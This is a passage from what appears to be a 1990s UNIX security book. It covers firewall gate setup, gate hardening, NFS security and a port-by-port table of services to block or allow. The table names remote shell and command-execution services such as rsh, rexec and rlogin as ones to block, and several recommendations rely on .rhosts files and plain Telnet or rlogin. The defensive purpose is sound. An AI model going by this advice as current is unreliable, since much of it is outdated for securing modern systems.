groups from being sent outside. The administrator can also regulate which internal machines are allowed<br />

to read and post news.<br />

21.4.4 FTP<br />

If you wish to support anonymous FTP from the outside network, make sure the ~ftp/pub directory<br />

resides on the gate machine. (See Chapter 17, for information about how to set up anonymous FTP.)<br />

Internal users can access the ~ftp/pub directory via a read-only NFS partition. By leaving files in this<br />

directory, internal users can make their files available to users on the outside. Users from the outside use<br />

FTP to connect to the gate computer to read and write files. Alternatively, you may wish to make these<br />

directories available only to selected internal machines to help control which users are allowed to export<br />

files.[11]<br />

[11] Note that running NFS on the gate just for FTP access is dangerous and we do not<br />

recommend it.<br />

The best way to give internal users the ability to use FTP to transfer files from remote sites is to use<br />

proxies or wrappers. This approach is more secure and easier to configure. Proxies are readily available;<br />

consider using the TIS Firewall Toolkit (see Appendix E, Electronic Resources for ways to obtain it), or<br />

SOCKS (described in Chapter 22). You will need to have an FTP client program that understands<br />

proxies. Fortunately, the FTP clients in many World Wide Web browsers already do so. They are also<br />

considerably easier to use than the standard <strong>UNIX</strong> FTP client.<br />

21.4.4.1 Creating an ftpout account to allow FTP without proxies.<br />

Another way that you can pass FTP through a firewall without using proxies is to create a special account<br />

on the gate machine named ftpout. Internal users connect via Telnet or rlogin to the gate and log in as<br />

ftpout. Only logins from internal machines should be allowed to this account.<br />

The ftpout account is not a regular account. Instead, it is a special account constructed for the purpose of<br />

using the ftp program. If you want added security, you can even set this account shell to be the<br />

/usr/ucb/ftp program.[12] When local users wish to transfer files from the outside, they will rlogin to the<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_04.htm (3 of 6) [2002-04-12 10:45:39]


[Chapter 21] 21.4 Setting Up the Gate<br />

ftpout account on the gate, use ftp to transfer the files to the gate, log out of the gate computer, and then<br />

use a read-only NFS partition to read the files from the gate. The ftpout account should have a UID that<br />

is different from every other user on the system - including the ftp user.<br />

[12] Because the account has /usr/ucb/ftp as its shell, the FTP program's shell escape (!) will<br />

not work properly. This prevents the ftpout account from being used for other purposes.<br />

The ftpout strategy is less secure than using proxies. It allows users to view files that are brought in by<br />

FTP by other users. It also requires the cooperation of your users to manage the disk space on the gate<br />

machine. Nevertheless, it is a serviceable strategy if you cannot implement FTP proxies.<br />

There are a number of different ways in which you can protect the ftpout account from unauthorized use.<br />

One simple approach follows:<br />

1.<br />

2.<br />

3.<br />

Create the ftpout account on the gate with an asterisk (*) for a password (doing so prevents logins).<br />

Make the ftpout account's home directory owned by root, mode 755.<br />

Create a file ~ftp/.rhosts, owned by root, that contains a list of the local users who are allowed to<br />

use the ftpout service.<br />

Legitimate users can now use the ftpout by issuing the rlogin command:<br />

% rlogin gate -l ftpout<br />

The ftpout account must log (via syslog, console prints, or similar means), all uses. It must then run the<br />

ftp program to allow the user to connect out to remote machines and transfer files locally to the gate.<br />

Using the ftpout account is a cumbersome, two-step process. To transfer files from the outside network to<br />

the inside network, your users must follow these steps:<br />

1.<br />

2.<br />

3.<br />

4.<br />

5.<br />

6.<br />

Log into the ftpout account on the gate.<br />

Use the ftp command to transfer files from the outside computer to the gate.<br />

Log out of the ftpout account.<br />

Connect to the gate computer using the ftp command from the user's own machine.<br />

Transfer the files from the gate to the user's personal workstation.<br />

Delete the files on the gate.<br />

Transferring files from internal machines to machines on the other side of the firewall requires a similar<br />

roundabout process.<br />

The advantage of the ftpout system is that it allows users to import or export files, but it never makes a<br />

continuous FTP connection between internal and external machines. The configuration also has the<br />

advantage that it lets you keep a central repository of documents transferred via FTP, possibly with disk<br />

quotas. This configuration saves on storage. (Be advised, though, that all users of the ftpout account will<br />

share the same quota. You may wish to install a cron job that automatically deletes all files in the ftpout<br />

directory that have not been accessed in more than some interval, such as 90 minutes.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_04.htm (4 of 6) [2002-04-12 10:45:39]


[Chapter 21] 21.4 Setting Up the Gate<br />

You can create additional accounts, similar to ftpout, for users who wish to finger people on the outside.<br />

You can use a scheme exactly like the one described above for FTP to let local users use Telnet with<br />

remote sites. Do not use the same user ID and group for the telnetout account that you used for the ftp<br />

command.<br />

Alternatively, you can create your own dedicated servers or proxies on the gate for passing finger,<br />

Telnet, and other services.<br />

21.4.5 finger<br />

Many sites using gates disable the finger service, because finger often provides too much information to<br />

outsiders about your internal filesystem structure and account-naming conventions. Unfortunately, the<br />

finger command also provides very useful information, and disabling its operation at a large site may<br />

result in considerable frustration for legitimate outside users.<br />

As an alternative, you can modify the finger service to provide a limited server that will respond with a<br />

user's mailbox name, and optionally other information such as phone number and whether or not the user<br />

is currently logged in. The output should not provide the home directory or the true account name to the<br />

outside. The output also should not provide the last login time of the account; intruders may be able to<br />

use this information to look for idle accounts.<br />

21.4.6 Telnet and rlogin from Remote Sites into Your Network<br />

The biggest difficulty with firewall machines arises when a user is offsite and wishes to log in to his or<br />

her account via the network. After all, remote logins are exactly what the gate is designed to prevent! If<br />

such logins are infrequent, you can create a temporary account on the gate with a random name and<br />

random password that cannot be changed by the user. The account does not have a shell, but instead<br />

executes a shell script that does an rlogin to the user's real account. The user must not be allowed to<br />

change the password on this gate account, and must be forbidden from installing the account name in his<br />

or her local .rhosts file. For added security, be sure to delete the account after a fixed period of time -<br />

preferably a matter of days.[13]<br />

[13] Actually, consider not allowing rlogin in the first place and just using Telnet. And<br />

beware of password sniffers, who don't care if your name and password are random.<br />

If there are many remote users, or users who will be doing remote logins on a continuing basis, the above<br />

method will work but is unlikely to be acceptable to most users. In such a case, we recommend using the<br />

setup described above, with two changes: let users pick a gate account name that is more mnemonic, and<br />

force them to use some type of higher-security access device, such as a smart card ID, to access the gate.<br />

If passwords must be used on the gate accounts, be sure to age them frequently (once every two to four<br />

weeks), and let the machine generate the passwords to prevent users from setting the same passwords as<br />

those for their internal accounts.<br />

21.3 Example: Cisco Systems<br />

Routers as Chokes<br />

21.5 Special Considerations<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_04.htm (5 of 6) [2002-04-12 10:45:39]


[Chapter 21] 21.4 Setting Up the Gate<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_04.htm (6 of 6) [2002-04-12 10:45:39]


[Chapter 21] 21.5 Special Considerations<br />

Chapter 21<br />

Firewalls<br />

21.5 Special Considerations<br />

To make the firewall setup effective, the gate should be a pain to use: really, all you want this computer<br />

to do is forward specific kinds of information across the choke. The gate should be as impervious as<br />

possible to security threats, applying the techniques we've described elsewhere in this book, plus more<br />

extreme measures that you would not apply to a general machine. The list below summarizes techniques<br />

you may want to implement on the gate machine:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Enable auditing if your operating system supports it.<br />

Do not allow regular user accounts, but only accounts for people requiring incoming connections,<br />

system accounts for needed services, and the root account.<br />

Do not allow incoming connections to your X11 servers (ports 6000 through 6000+n, where n is<br />

the number of X11 displays on any given computer).<br />

Do not mount directories using NFS (or any other network filesystem). Export only directories that<br />

contain data files (ftp/pub, news, etc), never programs. Export read-only.<br />

Remove the binaries of all commands not necessary for gate operation, including tools like cc,<br />

awk, sed, ld, emacs, Perl, etc. Remove all libraries (except the shared portion of shared libraries)<br />

from /usr/lib and /lib. Program development for the gate should be done on another machine and<br />

copied to the gate machine; with program development tools and unnecessary commands removed,<br />

a cracker can't easily install Trojan horses or other nasty code. Remove /bin/csh, /bin/ksh, and all<br />

other shells except /bin/sh (which your system needs for startup). Change the permission on /bin/sh<br />

to be 500, so that it can only be run by the superuser.<br />

If you really don't want to remove these programs, chmod them from 755 to 500. The root user<br />

will still be able to use these programs, but no one else will. This approach is not as secure as<br />

removing the programs, but it is more effective than leaving the tools in place.<br />

chmod all system directories (e.g., /, /bin, /usr, /usr/bin, /etc, /usr/spool) to mode 711. Users of the<br />

system other than the superuser do not need to list directory contents to see what is and is not<br />

present. This change will really slow down someone who manages to establish a non-root shell on<br />

the machine through some other mechanism. Don't run NIS on the gate machine. Do not import or<br />

export NIS files, especially the alias and passwd files.<br />

Turn on full logging on the gate machine. Read the logs regularly. Set the syslog.conf file so that<br />

the gate logs to an internal machine as well as a hardcopy device, if possible.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_05.htm (1 of 2) [2002-04-12 10:45:39]


[Chapter 21] 21.5 Special Considerations<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Mount as many disks as possible read-only. This prevents a cracker from modifying the files on<br />

those disks. Some directories, notably /usr/spool/uucp, /usr/adm, and ~ftp/pub, will need to be<br />

writable. You can place all of these directories on a single partition and use symbolic links so that<br />

they appear in the appropriate place.<br />

Turn on process and file quotas, if available.<br />

Use some form of smart card or key-based access for the root user. If you don't use such devices,<br />

don't allow anyone to log in as root on the machine.<br />

Make the gate computer "equivalent" to no other machine. Remove the files /etc/hosts.equiv and<br />

/etc/hosts.lpd.<br />

Enable process accounting on the gate machine.<br />

Disable all unneeded network services.<br />

Finally, look back at the guidelines listed under Chapter 17 they are also useful when setting up a gate.<br />

When you configure your gate machine, remember that every service and program that can be run<br />

presents a threat to the security of your entire protected network. Even if the programs appear safe today,<br />

bugs or security flaws may be found in them in the future. The purpose of the gate is to restrict access to<br />

your network, not to serve as a computing platform. Therefore, remove everything that's not essential to<br />

the network services.<br />

Be sure to monitor your gate on a regular basis: if you simply set the gate up and forget about it, you<br />

may let weeks or more go by before discovering a break-in. If your network is connected to the <strong>Internet</strong><br />

24 hours a day, 7 days a week, it should be monitored at least daily.<br />

Even if you follow all of these rules and closely monitor your gate, a group of very persistent and clever<br />

crackers might still break through to your machines. If they do, the cause will not likely be accidental.<br />

They will have to work hard at it, and you will most likely find evidence of the break-in soon after it<br />

occurs. The steps we've outlined will probably discourage the random or curious cracker, as well as many<br />

more serious intruders, and this is really your goal.<br />

21.4 Setting Up the Gate 21.6 Final Comments<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch21_05.htm (2 of 2) [2002-04-12 10:45:39]


[Appendix G] Table of IP Services<br />

Appendix G<br />

G. Table of IP Services<br />

Table G-1 lists the IP protocols that are commonly used on the <strong>Internet</strong>. For completeness, it also lists<br />

many protocols that are no longer used and are only of historic interest.<br />

You can use this table to help you decide which protocols you do and do not wish to support on your<br />

<strong>UNIX</strong> computers. You can also use this table to help you decide which protocols to pass or block with a<br />

screening router, as described in Chapter 21, Firewalls. For example, at most sites you will wish to block<br />

protocols such as tftp, sunrpc, printer, rlogin and rexec. Most site administrators will probably wish to<br />

allow protocols such as ftp, smtp, domain, and nntp. Other protocols can be problematical.<br />

The "Suggested Firewall Handling" column gives a sample firewall policy that should be sufficient for<br />

many sites; in some cases, footnotes provide additional explanation. We generally advise blocking all<br />

services that are not absolutely essential. The reason for this suggestion is that even simple services, such<br />

as TCP echo, can be used as a means for launching a denial of service attack against your network. These<br />

services can also be used by an attacker to learn about your internal network topology. Although these<br />

services are occasionally useful for debugging, we feel that their presence is, in general, a liability - an<br />

accident waiting to happen. Services which are not listed in this table should be blocked unless you have<br />

a specific reason for allowing them to cross your firewall. For detailed information about firewalls policy<br />

and filtering, we suggest that you consult Building <strong>Internet</strong> Firewalls by D. Brent Chapman and<br />

Elizabeth D. Zwicky (<strong>O'Reilly</strong> & Associates, 1995).<br />

The "Notes" section in this table contains a brief description of the service. If the word "Sniff" appears,<br />

then this protocol may involve programs that require passwords and may be vulnerable to password<br />

sniffing; you may wish to disable it on this basis, or only use it with a one-time password system. The<br />

word "Spoof" indicates that the usual programs that use the protocol depend on IP-based authentication<br />

for its security and can be compromised with a variety of spoofing attacks. The annotation "Obsolete"<br />

appears on protocols which may no longer be in general use. Note that the absence of a "Sniff" or "Spoof"<br />

annotation does not mean that the protocol is not vulnerable to such attacks.<br />

The "Site Notes" column is a place where you can make your own notes about what you plan to do at<br />

your site.<br />

NOTE: This is not a comprehensive list of TCP and UDP services; instead, it is a list of the<br />

services that are most commonly found on <strong>UNIX</strong>-based computers. If you have computers<br />

on your network that are running operating systems other than <strong>UNIX</strong>, you may wish to pass<br />

packets that use ports not discussed here. A complete list of all assigned port numbers can<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appg_01.htm (1 of 9) [2002-04-12 10:45:40]


[Appendix G] Table of IP Services<br />

be found in RFC 1700 (or its successors)<br />

In addition to the services noted in the table, you should block all IP addresses coming from outside your<br />

network which claim to come from inside your network. That is, any packet coming into your network<br />

with a source IP address that indicates it is from your network should be discarded.<br />

IP packets with unusual option bits or invalid combinations of option bits should be blocked. This should<br />

probably include packets with source routing or record-route options set.<br />

Fragmented packets should be blocked if the offset for reassembly specifies a zero offset (that would<br />

cause the reassembly to rewrite the IP header). [1]<br />

[1] The idea for this table is based, in part, on Appendix B, Important Files from the book<br />

Firewalls and <strong>Internet</strong> <strong>Sec</strong>urity, by William R. Cheswick and Steven M. Bellovin<br />

(Addison-Wesley, 1994).<br />

Table G.1: Common TCP and UDP Services, by Port<br />

Port Protocol Name Notes Suggested Firewall<br />

Handling<br />

1 TCP tcpmux TCP port multiplexer. Rarely<br />

used.<br />

Block<br />

7 UDP, TCP echo Echos UDP packets and<br />

characters sent down TCP<br />

streams.<br />

Block[2]<br />

9 UDP, TCP discard Accepts connections, but<br />

discards the data.<br />

Block<br />

11 TCP systat System status - reports the<br />

active users on your system.<br />

Some systems connect this to<br />

who.<br />

Block<br />

13 UDP, TCP daytime Time of day in<br />

human-readable form.<br />

Block[3]<br />

15 TCP netstat Network status,<br />

human-readable. Obsolete<br />

(officially unassigned as of<br />

10/94).<br />

Block<br />

17 UDP qotd Quote of the day. Block<br />

19 UDP, TCP chargen Character generator. Block<br />

20 TCP ftp-data Data and command ports for requires special<br />

FTP. Sniff.<br />

handling.<br />

21 TCP ftp<br />

23 TCP telnet Telnet virtual terminal. Sniff. Be careful. [4]<br />

24 UDP, TCP For use by private email<br />

systems.<br />

Block<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appg_01.htm (2 of 9) [2002-04-12 10:45:40]<br />

Site<br />

Notes


[Appendix G] Table of IP Services<br />

25 TCP smtp Email. Allow to your firewall<br />

gate or bastion host.<br />

37 UDP, TCP time Time of day, in<br />

machine-readable form.<br />

Block<br />

38 UDP, TCP rap Route Access Protocol. Block<br />

42 UDP, TCP name Host Name Server. Obsolete. Block<br />

43 TCP whois Normally only run by NICs. Outbound only or Block.<br />

48 UDP, TCP auditd Digital Equipment<br />

Corporation audit daemon.<br />

Block<br />

49 UDP tacacs Sniff. Spoof. Block. You should place<br />

your tacacs<br />

authentication servers on<br />

the same side of your<br />

firewall as your terminal<br />

concentrators.<br />

53 UDP, TCP domain Domain Name Service. Spoof. Run separate<br />

nameservers for internal<br />

and external use. If you<br />

use firewall proxies, then<br />

you only need to provide<br />

DNS service on your<br />

firewall computer.<br />

67, 68 UDP bootp Boot protocol. Block<br />

69 UDP tftp Trivial FTP. Block<br />

70 TCP gopher, gopher+ Text-based information Outbound access with<br />

service. Sniff.<br />

proxies. Inbound<br />

connections only to an<br />

organizational gopher<br />

server running on a<br />

special host.<br />

79 TCP finger Return information about a Outbound only. [5] (You<br />

particular user account or may wish to refer<br />

machine.<br />

inbound finger queries to<br />

a particular message.)<br />

80 TCP http World Wide Web. Sniff. Outbound access with<br />

Spoof.<br />

proxies. Inbound<br />

connections only to an<br />

organizational WWW<br />

server running on a<br />

special host.<br />

87 TCP link Block<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appg_01.htm (3 of 9) [2002-04-12 10:45:40]


[Appendix G] Table of IP Services<br />

88 UDP kerberos Distributed authentication<br />

mechanism.<br />

Block unless you need<br />

inter-realm<br />

authentication.<br />

94 UDP, TCP objcall Tivoli Object Dispatcher. Block<br />

95 TCP supdup Virtual terminal similar to<br />

Telnet, rarely used. Sniff.<br />

Block<br />

109 TCP pop-2 Post Office Protocol, allows Block unless there is a<br />

reading mail over <strong>Internet</strong>. specific need to access<br />

Sniff.<br />

email through firewall.<br />

Consider using APOP,<br />

which is not susceptible<br />

to password sniffing. If<br />

you do pass this service,<br />

pass inbound<br />

connections only to your<br />

email host.<br />

110 TCP pop-3 Better Post Office Protocol.<br />

Sniff.<br />

111 UDP, TCP sunrpc Sun RPC portmapper. Spoof.<br />

[6]<br />

Block<br />

113 TCP auth TCP authentication service. Limit or block incoming<br />

Identifies the username<br />

belonging to a TCP<br />

connection.Spoof.<br />

requests.[7]<br />

119 TCP nntp Network News Transport Block with<br />

Protocol.<br />

exceptions.[8]<br />

121 UDP, TCP erpc Encore Expedited Remote<br />

Procedure Call.<br />

Block<br />

123 UDP, TCP ntp Network Time Protocol. Block with<br />

Spoof.<br />

exceptions.[9]<br />

126 UDP, TCP unitary Unisys Unitary Login. Block<br />

127 UDP, TCP locus-con Locus PC-Interface Conn<br />

Server.<br />

Block<br />

130 UDP, TCP cisco-fna Cisco FNATIV. Block with exceptions.<br />

131 UDP, TCP cisco-tna Cisco TNATIVE. Block with exceptions.<br />

132 UDP, TCP cisco-sys Cisco SYSMAINT. Block with exceptions.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appg_01.htm (4 of 9) [2002-04-12 10:45:40]


[Appendix G] Table of IP Services<br />

137 UDP, TCP netbios-ns NETBIOS Name Service. Block NETBIOS unless<br />

there is a specific host<br />

with which you need to<br />

exchange NETBIOS<br />

information. NETBIOS<br />

over TCP/IP is best<br />

handled with encrypted<br />

tunneling.<br />

138 UDP, TCP netbios-dgm NETBIOS Datagram Service.<br />

139 UDP, TCP netbios-ssn NETBIOS Session Service.<br />

144 UDP, TCP news Sun NeWS (Network Window Block<br />

System). Possibly Sniff. Spoof.<br />

Obsolete.<br />

156 UDP, TCP sqlsrv SQL Service. Sniff. Block<br />

161 UDP, TCP snmp Simple Network Management Block<br />

Protocol agents. Spoof. Sniff.<br />

162 UDP, TCP snmptrap SNMP traps. Block under most<br />

circumstances, although<br />

you may wish to allow<br />

traps from an external<br />

gateway to reach your<br />

internal network<br />

monitors.<br />

177 UDP, TCP xdmcp X Display Manager (XDM)<br />

Control Protocol.<br />

Sniff.Possibly Spoof.<br />

Block. You may wish to<br />

allow outgoing<br />

connections in special<br />

circumstances.<br />

Block<br />

178 UDP, TCP NSWS NEXTSTEP Window Server.<br />

Possibly Sniff.Spoof.<br />

194 UDP, TCP irc <strong>Internet</strong> Relay Chat Protocol. Block<br />

199 UDP, TCP smux SMUX (IBM). Block<br />

200 UDP, TCP src IBM System Resource<br />

Controller.<br />

Block<br />

201 UDP, TCP at-rtmp AppleTalk Routing Block AppleTalk unless<br />

Maintenance.<br />

there is a specific host or<br />

network with which you<br />

need to exchange<br />

AppleTalk information.<br />

AppleTalk over TCP/IP<br />

is best handled through<br />

encrypted tunneling.<br />

202 UDP, TCP at-nbp AppleTalk Name Binding.<br />

203 UDP, TCP at-3 AppleTalk Unused.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appg_01.htm (5 of 9) [2002-04-12 10:45:40]


[Appendix G] Table of IP Services<br />

204 UDP, TCP at-echo AppleTalk Echo.<br />

205 UDP, TCP at-5 AppleTalk Unused.<br />

206 UDP, TCP at-zis AppleTalk Zone Information.<br />

207 UDP, TCP at-7 AppleTalk Unused.<br />

208 UDP, TCP at-8 AppleTalk Unused.<br />

210 TCP wais WAIS server. Sniff. Block unless you run a<br />

server.<br />

220 TCP imap POP replacement. Sniff. Block unless there is a<br />

specific need to access<br />

email through the<br />

firewall. If you do pass<br />

this service, pass<br />

inbound connections<br />

only to your email host.<br />

387 TCP avrp AppleTalk Routing. Block<br />

396 UDP, TCP netware-ip Novell Netware over IP. Sniff. Block<br />

411 UDP, TCP rmt Remote Tape. Block<br />

512 UDP biff Real-time mail notification. Block<br />

512 TCP exec Remote command execution.<br />

Sniff.Spoof.<br />

Block<br />

513 UDP rwho Remote who command. Block<br />

513 TCP login Remote login. Sniff. Spoof. These protocols are<br />

vulnerable to problems<br />

with "trusted hosts" and<br />

.rhost files. Block them<br />

if at all possible.<br />

514 TCP shell rsh. Sniff. Spoof.<br />

514 UDP syslog syslog logging. Block<br />

515 TCP printer Berkeley lpr system. Spoof. Block<br />

517 UDP talk Initiate talk requests. You should probably<br />

block these protocols for<br />

incoming and outgoing<br />

use. If you wish to<br />

permit your users to<br />

receive talk requests<br />

from outside sites, then<br />

you must allow user<br />

machines to receive TCP<br />

connections on any<br />

TCP/IP port over 1024.<br />

The protocols further<br />

require that both<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appg_01.htm (6 of 9) [2002-04-12 10:45:40]


[Appendix G] Table of IP Services<br />

hostnames and<br />

usernames of your<br />

internal users be made<br />

available to outsiders.<br />

talk can further be used<br />

to harass users.<br />

518 UDP ntalk Initiate talk requests.<br />

520 UDP route Routing control. Spoof. Block<br />

523 UDP, TCP timed Time server daemon. Spoof. Block<br />

532 UDP, TCP netnews Remote readnews. Block<br />

533 UDP, TCP netwall Network Write to all users. Block<br />

540 TCP uucp Used mostly for sending<br />

batches of Usenet news. Sniff.<br />

Spoof.<br />

Block unless there are<br />

specific hosts with which<br />

you wish to exchange<br />

UUCP information.<br />

550 UDP, TCP nrwho New rwho. Block<br />

566 UDP, TCP remotefs RFS remote filesystem. Sniff.<br />

Spoof.<br />

Block<br />

666 TCP mdqs Replacement for Berkeley's<br />

printer system.<br />

Block<br />

666 UDP, TCP doom Doom game. Block<br />

744 TCP FLEXlm FLEX license manager. Block<br />

754 TCP tell Used by send Block<br />

755 UDP securid <strong>Sec</strong>urity Dynamics<br />

ACE/Server. Sniff [10]<br />

Block<br />

765 TCP webster Dictionary service. Block<br />

1025 TCP listener System V Release 3 listener. Block<br />

1352 UDP, TCP lotusnotes Lotus Notes mail system. Block<br />

1525 UDP archie Tells you where things are on Block, except the<br />

the <strong>Internet</strong>.<br />

specific archie servers<br />

you want to use.<br />

2000 TCP OpenWindows Sun proprietary window<br />

system.<br />

Block<br />

2049 UDP, TCP nfs Sun NFS Server (usually).<br />

Spoof.<br />

Block<br />

2766 TCP listen System V listener. Block<br />

3264 UDP, TCP ccmail Lotus cc:Mail. Block<br />

5130 UDP sgi-dogfight Silicon Graphics flight<br />

simulator.<br />

Block<br />

5133 UDP sgi-bznet Silicon Graphics tank demo. Block<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appg_01.htm (7 of 9) [2002-04-12 10:45:40]


[Appendix G] Table of IP Services<br />

5500 UDP securid <strong>Sec</strong>urity Dynamics<br />

ACE/Server version 2. Sniff.<br />

[11]<br />

Block<br />

5510 TCP securidprop <strong>Sec</strong>urity Dynamics<br />

ACE/Server slave. Sniff. [12]<br />

Block<br />

5701 TCP xtrek X11 xtrek. Block<br />

6000<br />

thru<br />

6063<br />

TCP x-server X11 server. Sniff. Spoof. Block<br />

6667 TCP irc <strong>Internet</strong> Relay Chat. Block<br />

7000<br />

thru<br />

7009<br />

UDP, TCP afs Andrew File System. Spoof. Block<br />

7100 TCP font-service X Server font service. Block<br />

[2] Protocols such as echo can be used to probe the internal configuration of your network.<br />

They can also be used for creative denial of service attacks.<br />

[3] As some programs use the system's real time clock as the basis of a cryptographic key,<br />

revealing this quantity on the <strong>Internet</strong> can lead to the compromise of some security-related<br />

protocols.<br />

[4] Telnet Server. Conventional Telnet may result in passwords being sniffed on the<br />

network. You may wish to only allow specially encrypted or authenticated Telnet.<br />

[5] The finger client program can be susceptible to certain kinds of data-driven attacks if<br />

you do not use a suitable finger wrapper.<br />

[6] But note that a port scan can still find RPC servers even if portmapper is blocked.<br />

[7] As discussed in the text, the values returned as part of this service are unreliable if the<br />

remote machine is not under your control.<br />

[8] Outbound and inbound NNTP connections should only be allowed to the pre-established<br />

sites with which you exchange news.<br />

[9] Allowing NTP from outside machines opens your site to time-spoofing attacks. If you<br />

must receive your time from outside your site via the <strong>Internet</strong>, only allow NTP packets from<br />

specified hosts.<br />

[10] Traffic may be encrypted, but the administrator may decide not to turn this on. Export<br />

versions (non-U.S.) do not have encryption available.<br />

[11] See note 10.<br />

[12] See note 10.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appg_01.htm (8 of 9) [2002-04-12 10:45:40]


[Appendix G] Table of IP Services<br />

F.3 Emergency Response<br />

Organizations<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appg_01.htm (9 of 9) [2002-04-12 10:45:40]


[Chapter 22] 22.5 UDP Relayer<br />

22.5 UDP Relayer<br />

Chapter 22<br />

Wrappers and Proxies<br />

UDP Relayer is a program written by Tom Fitzgerald that receives UDP packets and retransmits them to<br />

other computers. Like SOCKS, it has a configuration file that allows you to specify which kinds of<br />

packets should be forwarded and which should not. Because UDP is a connectionless protocol, UDP<br />

Relayer must keep track of outgoing packets so that incoming packets can be relayed back to the proper<br />

sender. By default, UDP Relayer remembers outgoing packets for 30 minutes.<br />

At the time of this writing, UDP Relayer was in an early 0.2 Alpha release. A future release is planned,<br />

but that release may or may not occur - especially considering that SOCKS Version 5 will include<br />

support for UDP.<br />

Thus, instead of providing detailed instructions regarding the program's use, we will merely tell you how<br />

to get the program, and then refer you to the program's documentation.<br />

22.5.1 Getting UDP Relayer<br />

UDP Relayer can be freely downloaded from the <strong>Internet</strong>. The address is:<br />

ftp://ftp.wang.com/pub/fitz/udprelay-0.2.tar.Z<br />

In the 0.2 release, the file README contains information on installing the program. The file<br />

ARCHIE-NOTES contains specific information on making UDP Relayer work with Archie.<br />

22.4 SOCKS 22.6 Writing Your Own<br />

Wrappers<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch22_05.htm [2002-04-12 10:45:41]


[Chapter 20] 20.4 Improving NFS <strong>Sec</strong>urity<br />

Chapter 20<br />

NFS<br />

20.4 Improving NFS <strong>Sec</strong>urity<br />

There are many techniques that you can use to improve overall NFS security:<br />

1.<br />

2.<br />

3.<br />

4.<br />

5.<br />

6.<br />

7.<br />

8.<br />

9.<br />

10.<br />

11.<br />

Limit the use of NFS by limiting the machines to which filesystems are exported, and limit the number of filesystems that each<br />

client mounts.<br />

Export filesystems read-only if possible.<br />

Use root ownership of exported files and directories.<br />

Remove group write permissions from exported files and directories.<br />

Do not export the server's executables.<br />

Do not export home directories.<br />

Do not allow users to log into the server.<br />

Use the fsirand program, as described below.<br />

Set the portmon variable, so that NFS requests that are not received from privileged ports will be ignored.<br />

Use showmount -e to verify that you are only exporting the filesystem you wish to export to the hosts specified with the correct<br />

flags.<br />

Use <strong>Sec</strong>ure NFS.<br />

These techniques are described below.<br />

20.4.1 Limit Exported and Mounted Filesystems<br />

The best way to limit the danger of NFS is by having each computer only export and/or mount the particular filesystems that are<br />

needed.<br />

If a filesystem does not need to be exported, do not export it. If it must be exported, export it to as few machines as possible by<br />

judiciously using restrictions in the exports list. If you have a sizeable number of machines to export to and such lists are tedious to<br />

maintain, consider careful use of the netgroups mechanism, if you have it. Do not export a filesystem to any computer unless you<br />

have to. If possible, export filesystems read-only, as we'll describe in the next section.<br />

If you only need to export part of a filesystem, then export only that part. Do not export an entire filesystem if you only need access<br />

to a particular directory.<br />

Likewise, your clients should only mount the NFS servers that are needed. Don't simply have every client in your organization mount<br />

every NFS server. Limiting the number of mounted NFS filesystems will improve overall security, and will improve performance<br />

and reliability as well.<br />

The above advice may seem simple, but it is advice that is rarely followed. Many organizations have configured their computers so<br />

that every server exports all of its filesystems, and so that every client mounts every exported filesystem. And the configuration gets<br />

worse: many computers on the <strong>Internet</strong> today make filesystems available without restriction to any other computer on the <strong>Internet</strong>.<br />

Usually, carelessness or ignorance is to blame: a system administrator faced with the need to allow access to a directory believes that<br />

the easiest (or only) way to provide the access is to simply enable file sharing for everybody.<br />

Export Can Be Forever<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch20_04.htm (1 of 6) [2002-04-12 10:45:41]


[Chapter 20] 20.4 Improving NFS <strong>Sec</strong>urity<br />

Some versions of NFS enforce the exports file only during mount, which means that clients that mount filesystems on a server will<br />

continue to have access to those filesystems until the clients unmount the server's filesystems or until they are rebooted. Even if the<br />

client is removed from the server's exports file and the server is rebooted, the client will continue to have access and can continue to<br />

use a filesystem after unmounting it, unless the directory is no longer exported at all, or unless fsirand is run on the exported<br />

filesystem to change the generation count of each inode.<br />

Distinguishing a file handle that is guessed from one that is returned to the client by the mount daemon is impossible. Thus, on<br />

systems where the exports are only examined upon mounting, any file on the NFS server can by accessed by an adversary who has<br />

the ability and determination to search for valid file handles.<br />

Not too long ago, one of us watched a student in a lab in the Netherlands mount filesystems from more than 25 U.S. universities and<br />

corporations on his workstation - most with read/write access!<br />

20.4.1.1 The example explained<br />

In the example we presented earlier in this chapter, Example 20.1An /etc/dfs/dfstab file with some problems" a system administrator<br />

made three dangerous mistakes. On the third line, the administrator exported the directory /tftpboot. This directory is exported to any<br />

